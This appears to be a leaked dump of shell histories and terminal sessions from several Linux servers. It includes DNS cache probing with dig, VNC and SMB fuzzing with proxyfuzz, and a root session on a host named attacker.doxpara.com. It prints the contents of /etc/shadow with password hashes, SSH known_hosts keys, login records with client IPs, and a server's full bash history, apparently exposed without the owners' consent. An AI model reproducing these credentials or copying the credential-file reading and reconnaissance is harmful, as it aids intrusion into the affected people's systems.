dig @127.0.0.1 foo.www.toorrr.com type1340
dig @127.0.0.1 www.toorrr.com type1340
dig @127.0.0.1 www.toorrr.com type1341
dig @127.0.0.1 www.toorrr.com any
dig @127.0.0.1 www.toorrr.com any
dig @127.0.0.1 www.toorrr.com any
dig @127.0.0.1 foo.www.toorrr.com 
dig @127.0.0.1 foo.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
killall named
named
dig @127.0.0.1 $RANDOM.www.toorrr.com 
killall named
named
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 www.toorrr.com 
killall named
named
dig @127.0.0.1 www.toorrr.com 
dig @127.0.0.1 www.toorrr.com TYPE1337
dig @127.0.0.1 www.toorrr.com ANY
dig @127.0.0.1 www.toorrr.com ANY
dig @127.0.0.1 www.toorrr.com TYPE1337
dig @127.0.0.1 www.toorrr.com ANY
dig @127.0.0.1 foo.www.toorrr.com 
dig @127.0.0.1 foo.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com mx
dig @127.0.0.1 $RANDOM.www.toorrr.com mx
fg
dig @127.0.0.1 $RANDOM.www.toorrr.com mx
dig @127.0.0.1 $RANDOM.www.toorrr.com mx
dig @127.0.0.1 $RANDOM.www.toorrr.com mx
dig @127.0.0.1 $RANDOM.www.toorrr.com any
dig @127.0.0.1 $RANDOM.www.toorrr.com 
dig @127.0.0.1 $RANDOM.www.toorrr.com mx
dig @127.0.0.1 $RANDOM.www.toorrr.com mx
dig @127.0.0.1 $RANDOM.www.toorrr.com mx
dig @127.0.0.1 $RANDOM.www.toorrr.com mx
tcpdump -n port 53 -w log
tcpdump -n port 53 -s 2000 -w log 
tcpdump -vvv -r log
tcpdump -vvv -r log | grep -i mx22
dig @127.0.0.1 mx22.toorrr.com +norecurse 
dig @127.0.0.1 mx22.toorrr.com any +norecurse 
dig @127.0.0.1 mx22.toorrr.com mx +norecurse 
dig @127.0.0.1 toorrr.com mx +norecurse 
dig @127.0.0.1 toorrr.com mx +norecurse 
dig @127.0.0.1 toorrr.com mx 
dig mx16.toorrr.com.
dig mx17.toorrr.com any 
dig mx17.toorrr.com +norecurse
dig @127.0.0.1 mx17.toorrr.com +norecurse
killall named
named
screen -D -R
screen -D -R
ps -axf | grep perl
exps -axf
ps -axf | grep perl
ps axf | grep -i named
named
screen -D -R
dig foo.toorrr.com
dig foo.toorrr.com
dig foo.toorrr.com
dig @127.0.0.1 $RANDOM.foo.toorrr.com
dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com
dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX
dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX
dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX
dig @127.0.0.1 $RANDOM.foo.toorrr.com MX
dig @127.0.0.1 $RANDOM.foo.toorrr.com MX
dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX
dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX
dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX
dig @127.0.0.1 $RANDOM.foo.toorrr.com MX
dig @127.0.0.1 $RANDOM.foo.toorrr.com MX
dig @127.0.0.1 $RANDOM.foo.toorrr.com MX
fg
dig ns1.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.foo.toorrr.com 
dig @127.0.0.1 $RANDOM.foo.toorrr.com MX
dig @127.0.0.1 $RANDOM.foo.toorrr.com MX
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
while [ 1 ] ; do dig @127.0.0.1 $RANDOM.dns-integrity-scan.com; sleep 1; done
dig +norecurse @127.0.0.1 www.google.com
dig +norecurse @127.0.0.1 www.google.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com mx
~.\
~.
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
dig @127.0.0.1 $RANDOM.dns-integrity-scan.com
screen -D -R
ls
screen -D -R
nc frontend.doxpara.com 500
nc frontend.doxpara.com 500
ls
python proxyfuzz.py 
python proxyfuzz.py -l 5901 -r 127.0.0.1 -p 5902 -w 5 -v
wget http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.py
python proxyfuzz.py 
apt-cache search twisted
apt-get install python-twisted
python proxyfuzz.py 
apt-cache search vnc
apt-get install xvnc
apt-cache search xvnc
apt-get install vncserver
apt-cache search vnc
apt-get install vino
apt-get update
apt-get install vino
vino
vino-preferences 
vino-preferences -h
man vino-preferences
apt-cache search vnc
cd
wget http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10_unixsrc.tar.bz2
tar xjvf tightvnc-1.3.10_unixsrc.tar.bz2 
cd vnc_unixsrc/
ls
make
imake
qmake
apt-get install imake
imake
ls
imake
make
make vncserver
make xvnc
make all
more Makefile 
ls
rm Makefile 
imake
more README 
xmkmf
make World
python proxyfuzz.py -l 5901 -r 127.0.0.1 -p 5902 -w 5 -v
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v
python proxyfuzz.py -l 5901 -r 127.0.0.1 -p 5902 -w 5 -v
tcpdump -n 
tcpdump -n  port 22
tcpdump -n not port 22
tcpdump -n not port 22 and tcp
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 20 -v
python proxyfuzz.py 
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 20 -v -c
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 200000 -v -c
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 200000 -v -c
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 200000 -v -c
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 200000 -v -c
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v -c
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v -c
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 25 -v -c
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 25  -c
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 25 -s
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 60 -s
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 600000 -v -s
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 600000 -s
python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 70 -v -s
apt-get install samba
ls
cd /etc
ls
cd samba/
ls
vim smb.conf 
pwd
ls ~
ls /home/root
mkdir /tmp/stuff
touch /tmp/stuff/heh.txt
fg
/etc/init.d/samba restart
cd /tmp
cd test
ls
cd stuff/
ls
vim hello.txt
man smb.conf
ls
wget http://zapinspace.com/images/previous_day.gif
apt-cache search netatalk
apt-cache search afp
cd
wget http://prdownloads.sourceforge.net/netatalk/netatalk-2.0.3.tar.bz2?download
tar xzvf netatalk-2.0.3.tar.bz2 
tar xjvf netatalk-2.0.3.tar.bz2 
cd netatalk-2.0.3
l
ls
./configure 
apt-cache search bdb
apt-get install libdb-dev
./configure 
make
make
find . | grep -i cnid_index.c
vim ./bin/cnid/cnid_index.c
ls
cd
/etc/init.d/samba stop
man smb.conf
cd /etc/samba/
ls
vim smb.conf 
vim smb.conf 
/etc/init.d/samba start
cd
python proxyfuzz.py 
python proxyfuzz.py -l 445 -r 127.0.0.1 -p 446 -s -v
python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -s -v
telnet 127.0.0.1 139
telnet 127.0.0.1 140
python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -s -v
python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -w 20 -s -v
python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -w 40 -s -v
python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -w 40 -s -v
ls
cd netatalk-2.0.3
ls
make
vim cnid_index.c
find . | grep -i cnid_index.c
vim ./bin/cnid/cnid_index.c
make
fg
make
fg
make
fg
make
find . | grep -i dbif.c
vim ./etc/cnid_dbd/dbif.c
make
ls
cd bin/
ls
cd ..
ls
cd sb
ls
more README 
cd doc/Netatalk-Manual.txt 
cd doc/Netatalk-Manual.txt 
more doc/Netatalk-Manual.txt 
make install
netatalk-config 
fg
more doc/Netatalk-Manual.txt 
atalkd -h
atalkd -
atalkd ?
atalkd -?
atalkd 
fg
ls
cd ..
ls
screen -D -R
dig @217.219.86.36 www.news.com
dig @217.219.86.36 www.facebook.com
dig @217.219.86.36 www.news.com
dig @217.219.86.36 www.fark.com
dig @217.219.86.36 www.twitter.com
dig @217.219.86.36 www.facebook.com
dig @81.12.75.2 www.news.com
dig @81.12.75.2 www.facebook.com
dig @81.12.75.2 www.bbc.co.uk
dig @81.12.75.2 www.myspace.com
dig @217.218.120.131 www.news.com
dig @81.12.75.2 www.cnn.com
dig @81.12.75.2 tehranbureau.com
dig @81.12.75.2 twitter.com
dig @81.12.75.2 www.twitter.com
dig @81.12.75.2 www.friendfeed.com
dig @81.12.75.2 www.youtube.com
dig @217.219.86.36 www.news.com
dig @217.219.86.36 www.twitter.com
dig @217.219.86.36 www.friendfeed.com
dig @217.219.86.36 www.facebook.com
dig @217.219.86.36 www.facebook.com
dig @81.12.75.2 www.facebook.com
dig @202.227.96.4 www.news.com
dig @202.227.96.4 www.news.com
dig @80.191.197.2 www.news.com
dig @213.217.54.99 www.news.com
dig @213.217.54.99 www.twitter.com
dig @213.217.54.99 www.facebook.com
dig @213.217.54.99 www.facebook.com
dig @213.217.54.99 www.facebook.com
dig @213.217.54.99 www.facebook.com
dig  @81.12.75.2 www.facebook.com
dig  @81.12.75.2 www.facebook.com
dig  @81.12.75.2 www.facebook.com
dig @80.191.175.131 www.facebook.com
dig @81.12.75.2 www.cnn.com
dig @81.12.75.2 www.facebook.com
dig @85.185.143.162 www.news.com
dig @80.191.249.6 www.news.com
dig @80.191.249.6 www.facebook.com
dig @81.12.75.2 www.facebook.com
dig @217.219.158.131 www.news.com
dig @217.219.158.131 www.facebook.com
dig +norecurse @217.219.158.131 www.facebook.com
dig +norecurse @217.219.158.131 www.facebook.com
dig +norecurse @217.219.158.131 glb01.ash1.tfbnw.net.
dig @217.219.158.131 www.facebook.com
dig @217.219.158.131 www.facebook.com
dig @217.219.158.131 www.youtube.com
dig @217.219.158.131 mail.google.com
dig @217.219.158.131 www.gmail.com
dig @217.219.30.132 www.news.com
dig @217.219.30.132 www.facebook.com
dig @217.219.30.132 www.twitter.com
dig @80.191.117.2 www.twitter.com
dig @80.191.117.2 www.cnn.com
perl -MCPAN -e shell
screen -D -R
screen -D -R
perl -MCPAN -e shell
screen -D -R
ls
ls *pl
apt-get install ircii
apt-cache search irc
apt-get install irssi
irc
irssi 
adduser notroot
su notroot
apt-get install BitchX
apt-cache search bitchx
apt-cache search bitch
apt-cache search Bitch
apt-cache search irc
irc
irssi 
root@ovz-test:/root# ls -la /home/notroot/
total 28
drwxr-xr-x 3 notroot notroot 4096 Jun 24 10:26 .
drwxr-xr-x 3 root    root    4096 Jun 24 10:24 ..
-rw------- 1 notroot notroot   36 Jun 24 10:26 .bash_history
-rw-r--r-- 1 notroot notroot  220 Jun 24 10:24 .bash_logout
-rw-r--r-- 1 notroot notroot 2940 Jun 24 10:24 .bashrc
drwx------ 2 notroot notroot 4096 Jun 24 10:26 .irssi
-rw-r--r-- 1 notroot notroot  586 Jun 24 10:24 .profile
root@ovz-test:/root# cat /home/notroot/.bash_history
irsii
irssi 
apt-get install BitchX
root@ovz-test:/root# cat /etc/shadow
root:JuP94Nj1hM6Lg:14235:0:99999:7:::
daemon:*:14131:0:99999:7:::
bin:*:14131:0:99999:7:::
sys:*:14131:0:99999:7:::
sync:*:14131:0:99999:7:::
games:*:14131:0:99999:7:::
man:*:14131:0:99999:7:::
lp:*:14131:0:99999:7:::
mail:*:14131:0:99999:7:::
news:*:14131:0:99999:7:::
uucp:*:14131:0:99999:7:::
proxy:*:14131:0:99999:7:::
www-data:*:14131:0:99999:7:::
backup:*:14131:0:99999:7:::
list:*:14131:0:99999:7:::
irc:*:14131:0:99999:7:::
gnats:*:14131:0:99999:7:::
nobody:*:14131:0:99999:7:::
libuuid:!:14131:0:99999:7:::
dhcp:*:14131:0:99999:7:::
syslog:*:14131:0:99999:7:::
klog:*:14131:0:99999:7:::
sshd:*:14131:0:99999:7:::
mysql:!:14132:0:99999:7:::
messagebus:*:14347:0:99999:7:::
notroot:$1$5NXgAYu1$Q36ieersIyfNKhG3HP4rF0:14419:0:99999:7:::
root@ovz-test:/root# ls -la .ssh/
total 12
drwx------  2 root root 4096 Dec 27  2008 .
drwxr-xr-x 12 root root 4096 Jun 24 10:23 ..
-rw-r--r--  1 root root  884 Dec 27  2008 known_hosts
root@ovz-test:/root# cat .ssh/known_hosts 
|1|HENau5Q1+yxFsWNa0yBD2VN54IU=|GNshk4V0xaC8TR8hZZzjeQJPx7o= ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAw/uVRWNFRR0fdz1/0TY5zVlLSddEYng8F2YWQL9ytDeLw5heMue
5/ZPY9wjMG8ce8ekTYDEApd0d55CzoAJBl6llc67jGxFpBVHAiM73Wn8xv0wRK21XGGgbOMhY7Awk+3
mDQuMGqlPkX1SnePMqQ59xnjvj+RfNhidQr1xfhIEU0UDuBYSh+Ndzm3w4uNMjXuzfYpUVOBQpyQn1/
2ptG0mssozSbRKMLYM2wjM+uXfTSifam3zzxfTJa+9nG7i3KpIOaSDLC19mLYD60rOotN3vyzbnAF1w
nWUcVeHFmx7gDQuUnNcP2ZZpTtEfhdqw88R0OBO9Sn3KhWxZduqXtw==
|1|rTzTH8L7r8bFVz2KWEQuUou/gDM=|3w8k16LRasUGIshZU3MCH59jdNI= ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAw/uVRWNFRR0fdz1/0TY5zVlLSddEYng8F2YWQL9ytDeLw5heMue
5/ZPY9wjMG8ce8ekTYDEApd0d55CzoAJBl6llc67jGxFpBVHAiM73Wn8xv0wRK21XGGgbOMhY7Awk+3
mDQuMGqlPkX1SnePMqQ59xnjvj+RfNhidQr1xfhIEU0UDuBYSh+Ndzm3w4uNMjXuzfYpUVOBQpyQn1/
2ptG0mssozSbRKMLYM2wjM+uXfTSifam3zzxfTJa+9nG7i3KpIOaSDLC19mLYD60rOotN3vyzbnAF1w
nWUcVeHFmx7gDQuUnNcP2ZZpTtEfhdqw88R0OBO9Sn3KhWxZduqXtw==
root@ovz-test:/root# last

wtmp begins Wed Jul  1 06:54:39 2009
root@ovz-test:/root# :/
root@ovz-test:/root# logout
Connection to 209.40.204.174 closed.
%w
 8:45AM  up 75 days, 11:54, 1 user, load averages: 0.18, 0.13, 0.09
USER             TTY      FROM              LOGIN@  IDLE WHAT
crystal          p0       76.14.85.220      6:47AM  1:58 sleep 60


                 !~~~~~~~~ attacker.doxpara.com ~~~~~~~~!

root@attacker.doxpara.com's password: 
stdin: is not a tty
uname -a; id
Linux attacker 2.6.18-53.1.13.el5xen #1 SMP Tue Feb 12 14:04:18 EST 2008 i686 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
w
 15:58:41 up 62 days, 13:05,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
last
reboot   system boot  2.6.18-53.1.13.e Tue May 19 03:04 - 15:58 (62+12:53)  
root     pts/0        65.88.2.5        Wed Mar 11 19:33 - 21:46  (02:13)    
root     pts/2        c-68-32-169-60.h Fri Mar  6 19:26 - 21:38  (02:11)    
root     pts/1        dhcp64-134-142-7 Fri Mar  6 19:25 - 21:37  (02:11)    
root     pts/0        c-68-49-183-84.h Fri Mar  6 19:03 - 21:16  (02:13)    
root     pts/1        pool-71-163-75-2 Fri Mar  6 00:47 - 19:25  (18:38)    
root     pts/1        dsl092-160-052.w Fri Mar  6 00:28 - 00:47  (00:18)    
root     pts/2        166.197.228.144  Fri Mar  6 00:12 - 02:24  (02:12)    
root     pts/1        c-68-49-183-84.h Thu Mar  5 23:44 - 00:14  (00:29)    
root     pts/0        c-68-49-183-84.h Thu Mar  5 23:09 - 01:25  (02:15)    
root     pts/0        c-68-49-183-84.h Thu Mar  5 22:18 - 23:05  (00:46)    
root     pts/0        75-32-103-7.ligh Thu Feb 19 23:36 - 23:37  (00:00)    
root     pts/0        75-32-103-7.ligh Thu Feb 19 23:34 - 23:34  (00:00)    
root     pts/0        75-32-103-7.ligh Thu Feb 19 23:29 - 23:32  (00:03)    
reboot   system boot  2.6.18-53.1.13.e Wed Feb 18 00:03 - 15:58 (152+15:54) 
root     pts/0        dsl081-172-254.s Mon Feb 16 07:41 - down  (1+15:56)   
reboot   system boot  2.6.18-53.1.13.e Mon Feb 16 07:18 - 23:38 (1+16:20)   
root     pts/1        dsl081-172-254.s Sun Feb 15 20:20 - down   (10:31)    
root     pts/1        dsl081-172-254.s Sun Feb 15 19:53 - 19:53  (00:00)    
root     pts/1        dsl081-172-254.s Thu Feb  5 08:37 - 19:53 (10+11:16)  
root     pts/5        ip-69-33-128-51. Thu Feb  5 08:34 - down  (10+22:17)  
root     pts/5        62-50-219-254.cl Sat Dec 27 19:16 - 08:34 (39+13:17)  
root     pts/1        62-50-219-254.cl Sat Dec 27 18:27 - 19:22  (00:54)    
root     pts/1        62-50-219-254.cl Sat Dec 27 14:55 - 18:27  (03:32)    
root     pts/5        62-50-219-254.cl Sat Dec 27 02:53 - 19:16  (16:23)    
root     pts/1        62-50-219-254.cl Sat Dec 27 01:39 - 02:53  (01:13)    
root     pts/1        75-121-26-93.dyn Thu Dec 25 03:14 - 01:39 (1+22:25)   
root     pts/1        75-121-26-93.dyn Tue Dec 23 02:28 - 03:14 (2+00:45)   
root     pts/0        75-121-26-93.dyn Tue Dec 23 02:07 - 04:08  (02:00)    
reboot   system boot  2.6.18-53.1.13.e Tue Dec 23 00:08 - 06:51 (55+06:43)  

wtmp begins Tue Dec 23 00:08:27 2008
ls -la
total 1328
drwxr-xr-x  8 root     root       4096 Mar  6 01:00 .
drwxr-xr-x 21 root     root       4096 Dec 23  2008 ..
-rw-r--r--  1 root     root       7519 Mar 11 21:46 .bash_history
-rw-r--r--  1 root     root       2227 Oct 20  2007 .bashrc
drwxr-xr-x  3 root     root       4096 Dec 23  2008 .cpan
-rw-------  1 root     root        398 Feb 15 20:34 .mysql_history
-rw-r--r--  1 root     root        141 Oct 20  2007 .profile
-rw-------  1 root     root       1024 Dec 23  2008 .rnd
drwxr-xr-x  4 maildrop users      4096 Dec 23  2008 MIME-Base64-3.07
-rw-r--r--  1 root     root      15548 Nov 30  2005 MIME-Base64-3.07.tar.gz
drwxr-xr-x  7     1001 root       4096 Dec 23  2008 Net-DNS-0.63
-rw-r--r--  1 root     root     149488 Feb  8  2008 Net-DNS-0.63.tar.gz
drwxr-xr-x  4 maildrop maildrop   4096 Dec 23  2008 Net-IP-1.25
-rw-r--r--  1 root     root      25749 May 24  2006 Net-IP-1.25.tar.gz
drwxr-xr-x  6 maildrop maildrop   4096 Dec 23  2008 Net-Server-Mail-0.17
-rw-r--r--  1 root     root      16017 Mar 17  2008 Net-Server-Mail-0.17.tar.gz
-rw-r--r--  1 root     root          0 Feb 15 20:28 config.h
-rw-r--r--  1 root     root       1620 Feb 16 08:09 dns.pl
-rw-r--r--  1 root     root     228850 Dec 23  2008 dnsrake.zip
-rwxr-xr-x  1 root     root      12335 Mar  6 01:00 dnsrake_hacdc
-rw-r--r--  1 root     root       8741 Mar  6 00:59 dnsrake_hacdc.c
-rw-r--r--  1 root     root       1762 Mar  6 00:57 hacdcdemo.pl
drwxr-xr-x 11 maildrop maildrop   4096 Feb 15 20:28 ldns-1.5.1
-rw-r--r--  1 root     root     781562 Feb 10 17:35 ldns-1.5.1.tar.gz
-rw-r--r--  1 root     root        768 Dec 23  2008 mail.pl
-rwxr-xr-x  1 root     root      13883 Feb 15 20:35 phonym
-rw-r--r--  1 root     root       7738 Feb 15 20:45 phonym.c
cat .bash_history
apt-get clean
logout
exit
apt-cache search ldns
gcc
apt-get install gcc make binutils
apt-get install gcc make binutils libc6-dev 
hostname
hostname
ls
apt-get install postfix
apt-get install dovecot
apt-get install dovecot-common
useradd maildrop
passwd maildrop
cd/etc
cd /etc
cd postfix/
ls
vim /etc/postfix/virtusertable
hostname
hostname attacker
vim /etc/hostname 
perl -MCPAN -e shell
ls
bg
top
fg
kill %1
cd
wget http://search.cpan.org/CPAN/authors/id/G/GU/GUIMARD/Net-Server-Mail-0.17.tar.gz
/etc/init.d/postfix stop
tar xzvf Net-Server-Mail-0.17.tar.gz 
cd Net-Server-Mail-0.17
perl Makefile.PL 
make install
cd
cat > mail.pl
vim mail.pl 
perl mail.pl
vim mail.pl 
perl mail.pl
fg
kill %1
fg
kill -9 %1
fg %2
vim mail.pl 
perl mail.pl
perl mail.pl
fg
perl mail.pl
fg
perl mail.pl
perl mail.pl
perl mail.pl
perl mail.pl
fg %2
fg
perl mail.pl
fg
perl mail.pl
vim mail.pl 
perl mail.pl
fg
vim mail.pl 
hostname
perl mail.pl 
screen -D -R
apt-get install screen
screen -D -R
wget http://search.cpan.org/CPAN/authors/id/O/OL/OLAF/Net-DNS-0.63.tar.gz
perl -MCPAN -e shell
screen -D -R
screen -D R
screen -D -R 
screen -D -R
fg
screen -D -R
screen -D -R
mysql
cd /etc
cd mysql/
ls
vim my.cnf 
ifconfig 
fg
/etc/init.d/mysql stop
/etc/init.d/mysql start
mysql 
mysql backend
screen -D -R
apt-get install postfix
dig $RANDOM.doxdns1.com
perl mail.pl 
perl mail.pl 
wget http://search.cpan.org/CPAN/authors/id/G/GA/GAAS/MIME-Base64-3.07.tar.gz
tar xzvf MIME-Base64-3.07.tar.gz 
cd MIME-Base64-3.07
perl Makefile.PL 
make
make install
cd ..
vim mail.pl 
perl mail.pl 
perl mail.pl 
perl mail.pl 
dig +trace ns89.worldnic.com
dig +trace www.doxpara.com
dig txt123.doxdns1.com
dig txt123.doxdns1.com txt
dig txt123.doxdns1.com txt
dig @backend.doxpara.com txt123.doxdns1.com txt
cd
wget http://perl.secsup.org/authors/id/O/OL/OLAF/Net-DNS-0.63.tar.gz
killall -9 perl
wget http://www.sfr-fresh.com/unix/privat/Net-DNS-0.63.tar.gz
tar xzvf Net-DNS-0.63.tar.gz 
cd Net-DNS-0.63
perl Makefile.PL 
cd
wget http://search.cpan.org/CPAN/authors/id/M/MA/MANU/Net-IP-1.25.tar.gz
tar xzvf Net-IP-1.25.tar.gz 
cd Net-IP-1.25
perl Makefile.PL 
make
make install
cd ..
cd Net::DNS
cd *DNS*
ls
perl Makefile
perl Makefile.PL 
make install
cd
vim dns.pl
perl dns.pl
fg
vim dns.pl
perl dns.pl
fg
vim dns.pl
perl dns.pl
ifconfig 
perl dns.pl
fg
vim dns.pl 
perl dns.pl 
fg
perl dns.pl 
fg
ifconfig 
fg
perl dns.pl 
fg
vim dns.pl 
perl dns.pl 
vim dns.pl 
perl dns.pl 
fg
perl dns.pl 
fg
vim dns.pl 
perl dns.pl 
fg
perl dns.pl 
fg
fg
perl dns.pl 
ping attacker.doxpara.com
tcpdump -n port 53
apt-get install tcpdump
tcpdump -n port 53
ls
mysql
screen -D -R
passwd root
screen -X
screen -x
screen -D -R -x
screen -X
screen -h
screen -D -R
screen -x
ls
cd /var/www
ls
ls -l
ps axf | grep -i apache
ps axf | grep -i mysql
cd /var/www/
l
ls
ps axf | grep -i apache
cd /usr
ls
cd /var
ls
cd
ls
cd /
ls
find . | html
find . | grep html
find . | grep apache2
cd /var/www
ls
more index.html 
wget
wget http://ftp.drupal.org/files/projects/drupal-5.15.tar.gz
tar xzvf drupal-5.15.tar.gz 
cd drupal-5.15
ls
mv * ..
cd ..
ls
chmod -R 0777 sites/default/settings.php 
mysql
chmod 0700 sites/default/settings.php 
ls
rm index.html 
vi settings.php
vi sites/default/settings.php 
mysql toorcamp
ls
mv drupal-5.15.tar.gz ..
rm -rf *
tar xzvf ../drupal-5.15.tar.gz 
cd drupal-5.15/
ls
mv * ..
cd . .
ls
ls
cd ..
ls
mysql
chmod 0777 sites/default/settings.php 
chmod 0700 sites/default/settings.php 
chmod -R 0777 .
ls
ls
ls
ls
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
ls -l toorcamp.sql 
sync
sync
